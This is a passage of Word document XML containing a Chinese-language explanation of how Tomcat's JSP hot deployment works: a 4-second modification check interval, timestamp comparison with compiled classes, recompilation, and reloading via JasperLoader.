      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>热部署的实现原理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，总结沉淀一下吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A960A2" w:rsidRPr="00F41A4C" w:rsidRDefault="00A960A2" w:rsidP="00A960A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidR="002048BF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Tomcat  jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>热部署的实现原理大体是这样的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>页面从上次访问到下次访问总是有默认几秒的缓存时间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>也就说并不是严格的即修改即生效</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>tocmat7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>默认是有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>秒的缓存延迟的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A960A2" w:rsidRPr="00F41A4C" w:rsidRDefault="00A960A2" w:rsidP="00A960A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidR="002048BF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>这个默认的缓存延迟是在类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>EmbeddedServletOptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>private intmodificationTestInterval = 4;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>这个属性定义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A960A2" w:rsidRPr="00F41A4C" w:rsidRDefault="00A960A2" w:rsidP="00A960A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="002048BF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>如果过了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>秒缓存时间即失效，这个时候</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>就会读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>modified</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>时间戳和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>目录下编译好的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>modified</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>的时间戳作对比</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A960A2" w:rsidRDefault="00A960A2" w:rsidP="00A960A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidR="008F2D36" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>如果相等则</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>文件没有过期，则不会重新编译</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>文件，如果过期了则重新将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>编译成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>，并进一步编译成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>。同时调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>JasperLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>来重新加载这个有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>编译好的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
      <w:r w:rsidR="00686C22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>下面具体分析一下这个过程</w:t>
      </w:r>
      <w:r w:rsidR="002B589F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B6E87" w:rsidRDefault="005B6E87" w:rsidP="00A960A2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00735619" w:rsidRPr="00735619" w:rsidRDefault="005B6E87" w:rsidP="00735619">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
